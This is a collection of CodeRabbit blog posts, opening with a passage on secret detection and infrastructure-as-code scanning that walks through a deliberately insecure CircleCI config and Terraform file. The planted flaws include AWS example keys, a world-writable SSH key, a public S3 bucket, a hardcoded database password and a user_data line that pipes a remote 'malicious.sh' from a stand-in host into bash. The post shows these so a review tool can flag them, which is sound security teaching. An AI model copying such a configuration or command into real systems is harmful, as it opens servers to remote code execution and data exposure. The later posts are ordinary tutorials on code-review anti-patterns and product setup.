nodejs - run: name: Install dependencies command: | echo '{"dependencies": {"express": "4.0.0"}}' > package.json npm install - run: name: Run tests command: npm test - run: name: Check for vulnerabilities command: npm audit --production checkov: docker: - image: bridgecrew/checkov:2.0.0 steps: - checkout - run: name: Run Checkov command: | checkov --directory infrastructure terraform: executor: python-executor steps: - checkout - run: name: Install Terraform command: | curl -LO https://releases.hashicorp.com/terraform/1.5.0/terraform_1.5.0_linux_amd64.zip unzip terraform_1.5.0_linux_amd64.zip sudo mv terraform /usr/local/bin/ terraform --version - run: name: Terraform init command: terraform init working_directory: infrastructure/ - run: name: Terraform plan command: terraform plan working_directory: infrastructure/ - run: name: Terraform apply (development) when: on_success command: terraform apply -auto-approve working_directory: infrastructure/ environment: AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY docker: executor: python-executor steps: - checkout - run: name: Login to AWS ECR command: | aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin $ECR_REGISTRY - run: name: Build and tag Docker image command: | IMAGE_TAG=$(echo $CIRCLE_SHA1 | cut -c1-7) docker build -t $ECR_REGISTRY/my-app:latest . - run: name: Push Docker image to AWS ECR command: | IMAGE_TAG=$(echo $CIRCLE_SHA1 | cut -c1-7) docker push $ECR_REGISTRY/my-app:$IMAGE_TAG deploy: executor: python-executor steps: - checkout - run: name: Deploy to Development when: << pipeline.parameters.deploy_to_development >> command: | echo "Deploying to development environment" chmod 777 ~/.ssh/id_rsa - run: name: Deploy to Staging when: << pipeline.parameters.deploy_to_staging >> command: | echo "Deploying to staging environment" - run: name: Deploy to Production when: << pipeline.parameters.deploy_to_production >> command: | echo "Deploying to production environment" workflows: version: 2 build_and_deploy: jobs: - lint - yaml_lint: requires: - lint - gitleaks: requires: - yaml_lint - build: requires: - gitleaks - checkov: requires: - build - terraform: requires: - checkov - docker: requires: - terraform - deploy: requires: - docker ``` Before getting into the review, here is the high-level overview of the CircleCI Configuration file: * Triggers the CI/CD pipeline on pushes and pull requests to the main, develop, and staging branches for continuous integration. * Executes a linting workflow to check YAML syntax and install necessary dependencies for code quality. * Validates the structure and syntax of JavaScript code to catch errors early in development. * Sets up and checks Terraform configurations to manage and provision the cloud infrastructure securely. * Runs Gitleaks to detect hard-coded secrets in the codebase, enhancing security before deployment. * Executes tests to validate application functionality and check for vulnerabilities, ensuring stability. * Builds and tags a Docker image for the application, pushing it to AWS Elastic Container Registry (ECR) for deployment. * Deploys the application to different environments (development, staging, and production) with a manual approval step for production deployments. Having walked through the configuration file and its components, we will now explore each review given by Code Rabbit in detail. ### Code Review ![](https://victorious-bubble-f69a016683.media.strapiapp.com/188b9abba0e534d4a7ffb82eb9d60707aa4a447c1d654c174baa8914506bd0c1_f2bd2b9d64.png) In the gitleaks job, it flagged a potential security risk in the `circleci/config.yml` file due to the inclusion of a fake AWS secret key. If the file is accidentally committed, this could result in false positives or even create security vulnerabilities. Another concern is outputting the gitleaks report to the console, which could expose sensitive data in the CI logs. It suggests removing the fake secret key and updating the configuration to handle the gitleaks report securely. Instead of printing the report to the console, it recommends storing it as an artifact to prevent any sensitive information from being exposed, ensuring a more secure pipeline. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3e2c5e89e9168394dd979a487a973a5132850bb2bceb86f1dd90795f84781f08_9e5901df42.png) In the `yaml_lint` job, it has identified some areas for improvement in the configuration. Currently, the setup installs npm without verifying its availability in the `circleci/python:3.8` image, which can lead to inefficiencies. Additionally, using `|| true` in the linting command means the job will not fail even if there are linting errors, potentially masking critical issues in the YAML files. To address these concerns, it suggests checking for npm's existence before installation and removing the `|| true` to ensure the job fails when linting errors occur. This updated configuration will enhance efficiency and ensure that any issues with YAML files are properly flagged during the CI process. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f9ed76d6174e5b59d6b20a60cce7f89cf44384b5aac00b10ca3e53def3dbc1e7_c80892f20e.png) In the build job, it has captured concerns with the current method of dynamically creating a `package.json` file. The file only includes a single dependency (express 4.0.0), which may not represent the project’s actual requirements, and this outdated version could introduce security vulnerabilities. To enhance this setup, it suggests including a complete `package.json` file in the repository rather than generating it on the fly. If dynamic creation is necessary, ensure all required dependencies are listed with updated versions. Additionally, using `npm ci` instead of `npm install` is recommended for more consistent and reliable builds in CI environments. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e54a9ae8389ad519e7cd0115301239a4b640d654644d93b4aeaab44c9bf1f072_1d85b3dee0.png) In the deploy job, it has flagged a significant security risk due to the overly permissive SSH key permissions set to 777. This level of access poses a critical vulnerability, potentially allowing unauthorized users to read or modify the SSH key. Additionally, the deployment steps for both staging and production environments are currently just placeholders. To address these issues, it suggests changing the SSH key permissions to a more restrictive setting, such as 600, which allows read and write access only for the owner. It also recommends implementing actual deployment steps for each environment to ensure proper deployment processes are followed, enhancing both security and functionality in the deployment workflow. Here’s a sample `main.tf` file provisioning AWS resources, including an EC2 instance, security group, S3 bucket, and RDS database. However, it contains critical security vulnerabilities, such as hardcoded AWS credentials, overly permissive security group rules, public access configurations, and insecure user data scripts, which could jeopardize the security and reliability of the infrastructure. ```yaml provider "aws" { region = "us-west-2" access_key = "AKIAIOSFODNN7EXAMPLE" secret_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" } resource "aws_instance" "web_server" { ami = "ami-0c55b159cbfafe1f0" instance_type = "t2.micro" security_group_ids = ["sg-12345678"] key_name = "prod-key" user_data = <<-EOF #!/bin/bash echo "Sensitive data: password123" > /etc/secret.txt sudo curl http://example.com/malicious.sh | bash EOF tags = { Name = "production-web-server" } } resource "aws_security_group" "web_sg" { name_prefix = "web-sg-" description = "Web server security group" ingress { from_port = 0 to_port = 65535 protocol = "tcp" cidr_blocks = ["0.0.0.0/0"] } name_prefix = "web-sg-" description = "Web server security group" ingress { from_port = 0 to_port = 65535 protocol = "tcp" cidr_blocks = ["0.0.0.0/0"] } egress { from_port = 0 to_port = 65535 protocol = "udp" cidr_blocks = ["0.0.0.0/0"] } } resource "aws_s3_bucket" "app_data_bucket" { bucket = "my-app-data" acl = "public-read-write" versioning { enabled = false } lifecycle_rule { id = "data-cleanup" enabled = true expiration { days = 7 } noncurrent_version_expiration { days = 1 } } server_side_encryption_configuration { rule { apply_server_side_encryption_by_default { sse_algorithm = "AES256" } } } } resource "aws_rds_instance" "app_database" { identifier = "app-db-instance" engine = "mysql" instance_class = "db.t2.micro" allocated_storage = 5 username = "admin" password = "R@nd0mP@ss12345" publicly_accessible = true backup_retention_period = 0 multi_az = false } ``` Now, let's see how codeRabbit catches potential vulnerabilities. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/585c15049ec352c9ecffcab89238f89616fb65795c8c49a39232477cfd6f57d6_53ea5a1360.png) In the `main.tf` file, it has identified a significant security risk due to hardcoded AWS credentials in the provider configuration. Including `access_key` and `secret_key` directly in the code exposes sensitive information, creating a major vulnerability that could lead to unauthorized access to AWS resources. It suggests removing the hardcoded credentials and adopting a more secure approach, such as using environment variables or AWS IAM roles to mitigate this risk. Setting up AWS credentials securely by configuring the AWS CLI or utilizing IAM roles when deploying on AWS services will enhance security and protect your resources from unauthorized access. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ddd0d84a73ad73d650c3b7993406f870235ea008ccf0d65c92932a05101f1ebe_062127996b.png) In the `user_data` script, it has detected significant security risks associated with exposing sensitive data and executing untrusted scripts. Writing sensitive information, such as `password123`, to `/etc/secret.txt` can lead to unauthorized access. Additionally, executing a script from an untrusted source without validation severely threatens system integrity. To address these issues, it suggests removing the exposure of sensitive data and avoiding the execution of unverified scripts. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/542d12bed602997bb2b722e5e93242500ea324c3814d3d6b385b54a8c58b0705_5ddcd0115d.png) In the `aws_s3_bucket` resource configuration, it has captured a significant security risk due to the use of `acl = "public-read-write"`. This setting makes the S3 bucket publicly accessible for both reading and writing, which can lead to unauthorized data access and modification. It suggests changing the ACL to a more restrictive setting, such as `private`, to enhance security. This adjustment will help protect the bucket from unauthorized access and ensure that only authorized users can read or write data to the S3 bucket. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d63dd959b4c923e63a7c7db4ab2fc2c35459e8af2b34ecbf4b9d65db3bf0021b_604e630f9c.png) In the RDS instance configuration, it has identified significant concerns regarding data durability due to `backup_retention_period = 0` and `multi_az = false`. With backups disabled, there is a risk of data loss, and the lack of multi-AZ deployment indicates that the database is not configured for high availability. To enhance data protection and availability, it suggests enabling automated backups by setting `backup_retention_period` to a value greater than zero, such as 7 days, and configuring `multi_az` to `true`. These changes will improve data durability and ensure better database availability. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e765297787c1aa784ca7c2739ce2ca9f65855a54ef8c0b52402b5602feeed0a1_2494acaa22.png) In the security group configuration, it has detected a significant security concern due to overly permissive rules. The current setup allows inbound TCP traffic on all ports from any IP address (0.0.0.0/0) and outbound UDP traffic on all ports, which can expose your instances to potential security threats. It suggests restricting the ingress and egress rules to only necessary ports and IP ranges to enhance security. For example, if only HTTP (port 80) and HTTPS (port 443) are required, the configuration should be updated to allow only those ports. Additionally, it is recommended to limit outbound traffic to only what is necessary, such as allowing all protocols but specifying restricted conditions. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0cd26501d72f0ae22a8a924001dda6fd6b06b45430be4fd995b404c8d1a003d4_c07369b6ad.png) In the RDS instance configuration, it has detected significant security risks associated with hardcoded database credentials and the setting of `publicly_accessible = true`. The hardcoded password exposes sensitive information while allowing public accessibility, which increases the risk of unauthorized access to the database. To mitigate these risks, it suggests using AWS Secrets Manager or Parameter Store to manage database credentials securely. Additionally, the setting `publicly_accessible = false` will restrict direct public access to the database. The configuration should be updated to use variables for the username and password, ensuring they are defined securely. By addressing security risks and configuration improvements, CodeRabbit identifies critical issues to optimize your code, ensuring improved security and performance. ## How CodeRabbit Improves Security and Reliability in CI/CD Pipelines ### Enhanced Security It boosts security by automating secret detection and infrastructure such as Code (IaC) scanning, reducing the risk of exposing sensitive information like API keys and credentials. For instance, CodeRabbit identified hardcoded AWS credentials, highlighting this risk. Continuous monitoring allows for real-time identification of security misconfigurations before deployment. ### Increased Reliability Integrating security checks into the CI/CD pipeline ensures vulnerabilities and errors are caught early in development, leading to more stable software releases. Automated scans for secret detection and IaC misconfigurations reduce reliance on manual reviews. As seen, CodeRabbit flagged overly permissive security group rules, enabling prompt issue resolution. ### Faster Feedback Loop It provides near-instant feedback to developers during code reviews, detecting potential security issues as they arise. This rapid feedback allows for quick remediation, ensuring vulnerabilities are addressed without interrupting the development flow. Developers can act quickly by offering real-time security insights while maintaining continuous integration. ### Cost Efficiency Catching security issues early helps organizations avoid costs associated with data breaches, incident response, and legal penalties for non-compliance. For example, it identified vulnerabilities that could lead to significant operational expenses if left unchecked. Its proactive approach reduces expenses linked to incident response and reputational damage. ## Summary In conclusion, the importance of [Secret Detection and Infrastructure as Code (IaC)](https://docs.coderabbit.ai/tools/#supported-tools) scanning cannot be overstated when it comes to maintaining the security and reliability of CI/CD pipelines. By identifying vulnerabilities and misconfigurations, teams can significantly reduce the risk of security breaches and ensure that sensitive data remains protected. Integrating these practices into your development process is essential for fostering a security culture within your organization. [CodeRabbit](https://coderabbit.ai) is a powerful code review tool that enhances your security posture by automating your codebase's analysis of configuration files. Its ability to identify vulnerabilities and misconfigurations ensures that your infrastructure and deployment settings adhere to best practices, reducing the risk of security breaches. Streamlining the code review process for configuration files allows developers to maintain high-security standards without sacrificing efficiency. [Sign up](https://app.coderabbit.ai/login?free-trial) today to discover how CodeRabbit can transform your code reviews and strengthen your DevOps security efforts.

5 Code Review Anti-Patterns You Can Eliminate with AI

Desmond Obisi — Fri, 08 Nov 2024 00:00:00 GMT

Have you ever let a bug slip through because the pull request was too big to review properly? That's a typical anti-pattern. Trying to review a massive chunk of code in one go often leads to mistakes slipping through the cracks. Breaking it into smaller, manageable parts would save you the headache later. [Code reviews](https://coderabbit.ai/blog/code-reviews-made-easy-how-to-improve-code-quality) should keep your code clean, understandable, and easy to maintain. But sometimes, **bad habits like anti-patterns** often creep in. These common practices seem helpful but slow you down, hurt code quality, make your code harder to maintain, introduce bugs, and frustrate your team. In this guide, you’ll learn about the most common anti-patterns that pop up during code reviews and how to easily tackle them with artificial intelligence (AI). ## The Most Common Anti-Patterns in Software Development Anti-patterns generally exist in any programming language, and in contrast to best practices, they are highly counterproductive, steal valuable time, and lead to errors. These are some of the most common anti-patterns you’ll often encounter in software engineering during code reviews: **God Class (Or God Object)** A "God Class” happens when you create a class that takes on too many responsibilities. You end up relying on one class to handle multiple tasks that should be broken down into smaller, more focused classes. The result is a bloated, hard-to-maintain class where making changes in one place leads to unintended consequences elsewhere. This structure often introduces bugs, code duplication, and technical debt. %%[test-now] ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d054fe1085724d776b06ebd88d3666221072542409f03cf2ad8943ab473f8f8c_2e9977cffd.png) **Spaghetti Code** Spaghetti code happens when your code’s structure becomes so twisted and tangled that it’s nearly impossible to follow. This kind of code is difficult to review and maintain, whether due to excessive branching, deeply nested loops, or relying too much on global variables. It leads to longer review cycles, makes debugging harder, and can introduce new bugs through hidden dependencies. Here’s a sample of spaghetti code from a Go codebase that shows how things can spiral out of control. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/fbe01063019f28c20e642945bbcd551f5f0fd58f09dd90fde303e27688495987_bec828a198.png) **Nit-Picking and Style Feedback** Another common anti-pattern you might run into is spending too much time on minor style issues during code reviews, such as formatting or naming conventions. While consistency matters, spending too much time on trivial style concerns can distract you from the core review and waste everyone’s time. Your reviews should prioritize functionality, architecture, and logic, leaving formatting to automated tools or final touch-ups. Here is a good example in a JavaScript codebase of how this anti-pattern can occur in your software development process: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/66f4445fcbbbb6795d5a21a2a344ba1f299e402eb1694f5a90f60eaf4a6abba1_61ffc0e87e.png) **Primitive Obsession** Primitive obsession happens when you use simple data types like strings, integers, or booleans to represent more complex concepts. This makes the code harder to read, understand, and extend. You lose the rich meaning behind these values, making it challenging for others to work with your code later. Not only does this make future changes harder due to a lack of type safety and validation, but you also add to your technical debt. You’ll likely have to revisit that code to refactor it down the line. Here’s an example of how this anti-pattern can show up in a Rust codebase. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bef0d71fdc5b7506b3c30361f283861e11b12d24b1cb243b1fd09b5556f3c9a6_f35715eb2b.png) **Shotgun Surgery** Shotgun surgery is an anti-pattern where a single change to your codebase requires modifications to many different parts of the codebase. This often indicates that the responsibilities are not well-distributed across the system, leading to tightly coupled code that's difficult to maintain and extend. Shotgun surgery complicates maintenance by requiring changes in multiple places, increasing the risk of bugs, reducing code reusability and modularity, and making updates more time-consuming with a higher chance of inconsistencies. The code snippets below show how shotgun surgery anti-pattern is formed in a Go codebase: In this example, to add a tracking functionality to this email-sending service, you will have to update the **Email** structure. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a1eca498a76d84f8a280d5d10162fb2d94d356ac6b143b77c4bb373ea1ca8373_323a01e179.png) You will also need to update the logic itself: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d022a4eaed0e5202b8a1dd515b58f702871721a643f4001f7dd9ab3ac47c7e37_5301ad9656.png) Next, you will have to update the tasks handler: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dabf1b325b84f57620a4856d75be222640d91644e3e134c193d4881358370057_bf3cfcf91a.png) Finally, in the demo function, you will use the email service. This roundtrip that affects multiple files while making a little change is what gives rise to the shotgun surgery anti-pattern. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/29746023e6c789b0ac57f7ea3385a168f118e6a3d420277f8262c964939ca21b_83ed56764d.png) The following section shows how an AI tool like [CodeRabbit](https://coderabbit.ai/) can help you identify and resolve these anti-patterns in code reviews. ## How to Eliminate Anti-Patterns in Code Reviews With Coderabbit [CodeRabbit](https://docs.coderabbit.ai/) automates repetitive tasks, identifies potential issues, and offers smart suggestions, allowing you to focus on writing maintainable code. With integrations available for popular CI/CD tools and version control systems, CodeRabbit can easily fit into your existing workflows. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c6540a3b3bd596cf602b1728dd74d59fe83791961aee54d27d880469054dda93_0ecd23dff1.png) The diagram above illustrates how CodeRabbit streamlines the code review process by addressing anti-patterns to ensure clean code is produced for deployment. The process starts when a developer creates a new feature, fixes a bug, and submits a pull request that may contain inefficiencies or anti-patterns. During the code review phase, CodeRabbit detects and resolves these patterns, automating tasks that would otherwise slow down the review process. Now, let’s set up CodeRabbit and use it to eliminate these anti-patterns discussed above. **Setting up CodeRabbit** 1. Navigate to the [CodeRabbit Website](https://coderabbit.ai) and get started by signing up for a free account as shown below: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bea5fa0b18f55456ae263d40270ec98f47a767a6361451d23a668e9c8dcc2f9f_c0ca727056.png) 2. After a successful signup, you'll be directed to the dashboard to add the repositories you want CodeRabbit to integrate into. Click the **Add Repositories** as shown below to add your repositories: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b70e1079ca757c0a877a335c9d05e2049c8fb47cb2521eeda47580e64090a5a6_b0c7be2532.png) 3. Next, you will customize how CodeRabbit integrates and works with your repositories. Navigate to the **Organization Settings** menu to complete this setup as shown below: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9d71bbfeea316e98e04e54f6ff1640d14de528311c77be61fe74ce35ec4f2457_3e3742b989.png) To see CodeRabbit in action, create pull requests in any repositories you added. It will begin to provide well-tailored code reviews and suggestions for a better software development experience. CodeRabbit is also useful for plugging existing tools into your code review pipeline, like linting tools, CI/CD tools, etc. **Resolving God Class or Object with CodeRabbit** CodeRabbit will identify complex, overstuffed classes and suggest ways to break them down, as seen in this screenshot. By analyzing class complexity, it recommends splitting God Classes into smaller, more focused components that follow the single responsibility principle. It’ll also alert you to excessive lines of code, methods, and [cyclomatic complexity,](https://en.wikipedia.org/wiki/Cyclomatic_complexity) guiding you toward delegating functionality to more manageable classes. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/00352b3528e4e2686f5c9d6b79d64dcb5e06109979bca3401b05e86714a327d8_f80f7a8ae6.png) **Resolving Spaghetti Code with CodeRabbit** By analyzing logic flow and flagging overly complex sections, CodeRabbit helps you clean up spaghetti code. It offers refactoring suggestions to improve the structure of your code. You’ll get recommendations for breaking down large functions, replacing nested conditionals with polymorphism, and abstracting repetitive logic into reusable components. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/297ee30d335a55d23626bc4a1c0809f6950f776b3423155948a99d3eafff59fa_ad121287a3.png) **Resolving Nit-Picking and Style Feedback** The screenshot shows how CodeRabbit will automatically handle your style and formatting checks, ensuring your code stays consistent. This frees you to focus on the important parts like code logic and functionality. It'll also flag style issues so that you can concentrate on performance and architecture. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7f3e2e5abbed8fea094f7083c683216b7e1e2dc8d46a8a325a27af85917a8344_8247cb2c08.png) **Resolving Primitive Obsession** CodeRabbit will help you detect primitive obsession in your codebase and suggests replacing primitive types with domain-specific structures, leading to more expressive and robust code. It identifies your overuse of primitives, provides refactoring suggestions, and recommends type safety improvements, like using enums for status codes or custom types for domain concepts such as email addresses or currency values. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/eb3f4726fa583786ca82db5da6c5e990f24e63a691e7f4952757082c5d91c37c_70fd8e1bfd.png) **Resolving Shotgun Surgery Anti-patterns** CodeRabbit helps you by suggesting fixes for coupling issues. It analyzes dependencies, suggests refactoring strategies to centralize functionality, recommends design patterns to decouple systems, offers code organization tips, and provides automated refactoring options to implement improvements. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/037091fa4c950f09542062a17e424f14adbce7fcdc8caa9683fd5146d22c313f_d5c2285209.png) ## What’s Next? Aside from the anti-patterns we've discussed above, other issues can impact your code quality and the efficiency of your review process. These include: * **Lava Flow:** Old, unused code that builds up over time, increasing technical debt and cluttering your codebase. * **Cargo Cult Programming:** Applying patterns or tools without understanding why leads to unnecessary complexity. * **Yo-Yo Problem:** Complex inheritance structures that force developers to jump between multiple classes to understand the logic. * **Magic Numbers:** Hardcoding values directly into the code instead of using constants makes your code harder to read and maintain. [CodeRabbit](https://coderabbit.ai/) is built to identify and resolve these problems with AI-powered automation and intelligent refactoring suggestions. Streamlining your code reviews and eliminating these mistakes will reduce technical debt, keep your code cleaner, and improve overall maintainability and scalability. ## Conclusion Anti-patterns in code reviews can slow down your development, create unnecessary hurdles, and compromise the quality of your code. Identifying these anti-patterns through human code review has proven not so effective, but with the advent of artificial intelligence (AI) in code review tools today, they can be thoroughly spotted and eliminated. This will make your software architecture more solid. With CodeRabbit, you have a solution that helps you overcome these issues. From automating style checks to providing actionable feedback, CodeRabbit reshapes the review process, freeing you up to focus on delivering clean, maintainable code. [Sign up to CodeRabbit](https://coderabbit.ai/) for a free trial to improve your code reviews by integrating AI into your workflow.

How to Automate TypeScript Code Reviews with CodeRabbit

Ankur Tyagi — Wed, 06 Nov 2024 00:00:00 GMT

In code reviews, discussions often focus on minor issues like formatting and style, while critical aspects—such as functionality, performance, and backward compatibility—are overlooked. Code reviews can be even more challenging than writing code itself, as ensuring quality across these critical areas requires careful attention. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/acc0bc879df3fa56f8cca7d09630d6756ff5355c77bd2c3bec93943d06667582_c21d47959c.png) *Image by Gunnar Morling, licensed under CC BY-SA 4.0.* > Doing a 'perfect' code review means finding all the bugs, knowing best practices yourself, sorting through a bunch of code you didn't write, writing comments that could be taken as subjective criticism without sounding like a jerk, and justifying every comment you make. It's exhausting from a logical standpoint and a social standpoint. Or you can rubber stamp it but feel bad when a bug makes it through to production and the codebase becomes a mess. 10 lines changed : 10 comments, 500 lines changed : 'LGTM'. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2613737d37b71863204869f9bf8bcc0a1311c101d12347b9ef576e5a993df950_6e266545a4.jpg) Many development teams often focus on shipping bug-free code to production. While that's important, the ability to spot and resolve issues when they arise quickly is frequently overlooked—ideally through automated tools or straightforward processes. But what if I told you there's an easier way—one that streamlines code reviews in a fraction of the time? That's what CodeRabbit does. In this guide, we'll learn how to catch issues in a popular OSS TypeScript [codebase](https://github.com/dubinc/dub) using CodeRabbit. Upon completion, you can review TypeScript pull requests in your codebase and ensure that only high-quality code is merged into our repository using the AI code reviewer CodeRabbit. > Want to jump right in? Here is the [pull request](https://github.com/tyaga001/dub/pull/1) for a quick look. ## **Prerequisites** [CodeRabbit](https://coderabbit.ai/) is language-agnostic, so you don't need a specific programming language background. However, this article demonstrates how CodeRabbit works using the [Dub.co GitHub repository](https://github.com/dubinc/dub), written in Typescript. Before you begin, make sure you have the following: * [GitHub Profile](https://github.com/tyaga001) - Ensure you have an active GitHub account to fork and contribute to various code repositories. * Code Editor - A powerful code editor like [Visual Studio Code](https://code.visualstudio.com/) or [IntelliJ IDEA](https://www.jetbrains.com/idea/) ## **Why do you need an AI code reviewer?** As software engineering teams strive to maintain high-quality code while meeting tight deadlines, efficient and reliable code review processes become increasingly necessary. CodeRabbit can 10x your team's productivity and code quality as it can help you with: * **Faster Code Review Cycles** * **Consistent and Objective Feedback** * **Increased Developer Efficiency** * **Continuous Improvement** ## **How to configure CodeRabbit in GitHub** Signing up with CodeRabbit is a two-step process. First, log in using your GitHub account and then add our GitHub app to your organization. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dba42750f0e1996fe3e91eca2bf18774d0d11f870eeb70455208d7af63bcf000_5228195495.png) Next, we can integrate CodeRabbit into all our code repositories or select specific ones from the list. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/828e6e43e944a8f199adc329b3a2d254a4be06396ac7ba6195fce9ea2abb8e0e_a10fa90a2f.png) Now, CodeRabbit is fully integrated into our repositories and ready to review any code changes. It is as simple as that. ## **Reviewing TypeScript Code using CodeRabbit** > [Dub. co](https://github.com/dubinc/dub) is an open-source link management platform that offers features such as link shortening, analytics, free custom domains, a QR code generator for links, and more. Its codebase is written in TypeScript and React, so a basic understanding of these technologies will help you navigate it more effectively. To get started, let's fork the [Dub.co repository](https://github.com/tyaga001/dub). ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b18fe20b39dcd10bd8d6e103b3c5d126bc8bdac2a222b1903684b97b926c3983_4a242f41c4.png) Next, run the following command in your terminal to clone the [Dub.co](https://github.com/tyaga001/dub) TypeScript repository to your local computer. ```bash git clone https://github.com/dubinc/dub.git ``` Install its package dependencies using the command below: ```bash pnpm install ``` Rename or copy the **.env.example** file within the **apps/web** folder into a **.env** file: ```bash cp .env.example .env ``` Follow the steps in the Dub. co Local Development Guide to set up and run a local version of [dub.co](https://dub.co) on your computer. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0cd5984b6d1a2df976423b5b77bf8784948310c7bdfa080d903d7136cee065e0_79939a90a2.png) ### **Getting a PR review** Let us change the forked [Dub. co](https://github.com/dubinc/dub) repository and see how CodeRabbit identifies issues in a large TypeScript codebase. Before we proceed, create a new GitHub branch called `tutorial/coderabbit` in our forked repo. This will enable us to compare both branches and create pull requests. ![a GitHub repo showing branch selection with 'tutorial/coderabbit' highlighted.](https://victorious-bubble-f69a016683.media.strapiapp.com/8ecaf1963188da83aced62286ad7c780ba37e511f9ef106373b4d1a63263849f_61a3ac4668.png) Navigate into the **app** folder and update the code in the below files: * *app.dub.co/(dashboard)/\[slug\]/page.tsx* * *apps/web/app/api/links/route.ts* * *apps/web/app/*[*app.dub.co/(dashboard)/\[slug\]/auth.tsx*](http://app.dub.co/$dashboard$/%5Bslug%5D/auth.tsx) * *apps/web/app/*[*app.dub.co/(dashboard)/layout.tsx*](http://app.dub.co/$dashboard$/layout.tsx) **For example:** ```typescript export default function WorkspaceLinks() { return (

Testing how CodeRabbit works

CodeRabbit is an AI-powered code reviewer for your code repositories. It provides quick, context-aware code review feedback and line-by-line suggestions, significantly reducing manual review time.

); } ``` The code snippet changes the homepage content. ![CodeRabbit test message showcasing code review features.](https://victorious-bubble-f69a016683.media.strapiapp.com/6f5c7b293113b64b38f1c7354294bf40ccb5fc1d081a7e412b7c489aafb32bef_6bfb2e1fcf.png) To demonstrate how CodeRabbit works, we have updated the page. TSX file with the wrong React syntax and pushed the code to the test branch. You can do this via the GitHub web interface or command line. ```typescript import WorkspaceLinksClient from "./page-client"; export default function WorkspaceLinks() { return ( <>

Testing how CodeRabbit works

CodeRabbit is an AI-powered code reviewer for your code repositories. It provides quick, context-aware code review feedback and line-by-line suggestions, significantly reducing manual review time.

); } ``` Next, we can compare both branches and create a pull request. ![CodeRabbit-PR-Summary](https://victorious-bubble-f69a016683.media.strapiapp.com/a53d82ab2a8a52a7430e9312fb9405a7bfdc8b9fd26e9c96112ef292241b8fcb_7d13950f2c.png) CodeRabbit reviews the updated code on the `tutorial/code` rabbit branch, highlights the issues within the pull request, and even includes sequence diagrams showing how it analyses the code. Then, it provides a solution to ensure the pull request passes all necessary tests for merging. **For example,** let's look at the CodeRabbit in action. * PR summary by CodeRabbit ![PR summary by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/bc32461d64b7455df9e528906fd1d1ea1513b67a2fa9c81e9db228e6b786f766_abe27ebb58.png) * Complete walkthrough by CodeRabbit ![PR walkthrough by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/4363f08750cc907c3143d264947923533f9b02812cae979bcdfea045250754e9_d4c6794560.png) * **Actionable comments by** **CodeRabbit** ![Actionable comments by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/869e232cc0fba59afda168a9789165b3fb815ac7f041dd470c909b6268aaadf4_e61047010e.png) ![Committable suggestion by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/4654fcfd10750fa85888f0c8a7bdf840368a142866de29c0559f28d142cbeb2d_9e70b9067b.png) You can check the example pull request here on the [GitHub repository](https://github.com/tyaga001/dub/pull/1). Congratulations. You've successfully integrated CodeRabbit into an open-source `TypeScript` repository. # **Conclusion** We looked at how [CodeRabbit](https://coderabbit.ai/) could be integrated into a TypeScript repository. CodeRabbit is an AI Code Reviewer that helps you or your team merge your code changes faster with superior code quality. There is more that you could do with CodeRabbit with TypeScript or JavaScript. Here is some further reading: * [Enabling Automated Linting with Biome, Eslint](https://docs.coderabbit.ai/tools/biome) * [Adding Custom Review Instructions](https://docs.coderabbit.ai/guides/review-instructions) * [Discovering Code Intent Patterns](https://docs.coderabbit.ai/guides/commands) [Sign up](https://app.coderabbit.ai/login?free-trial) to CodeRabbit today and merge your PR 10x faster, without compromising code quality or security.

Getting Started with CodeRabbit using Azure DevOps

Aravind Putrevu — Mon, 28 Oct 2024 00:00:00 GMT

We're thrilled to announce that CodeRabbit, our AI-native Code Reviewer, now integrates seamlessly with Azure DevOps. This integration brings the power of [AI-native Code Review](https://coderabbit.ai) to one of the most popular Cloud platforms, helping you catch bugs early, improve code quality, and enhance developer productivity. ### Why Azure DevOps? Azure DevOps is a popular cloud-based platform that provides a comprehensive set of tools for collaborative software development. It offers features like source control, work item tracking, continuous integration and delivery (CI/CD), and more. By integrating CodeRabbit with Azure DevOps, we're making it easier for teams already using Microsoft Azure to leverage AI-native code reviews without disrupting their established Code quality processes. Azure DevOps is trusted by numerous enterprises and development teams worldwide. Its robust features, scalability, and tight integration with the Microsoft ecosystem make it a preferred choice for many organizations. Interestingly, it offers full compatibility with GitHub’s Enterprise Server features. ### How to Use CodeRabbit with Azure DevOps? Using CodeRabbit with Azure DevOps is simple and straightforward. Here's how you can get started: * Log in with your Azure DevOps Account 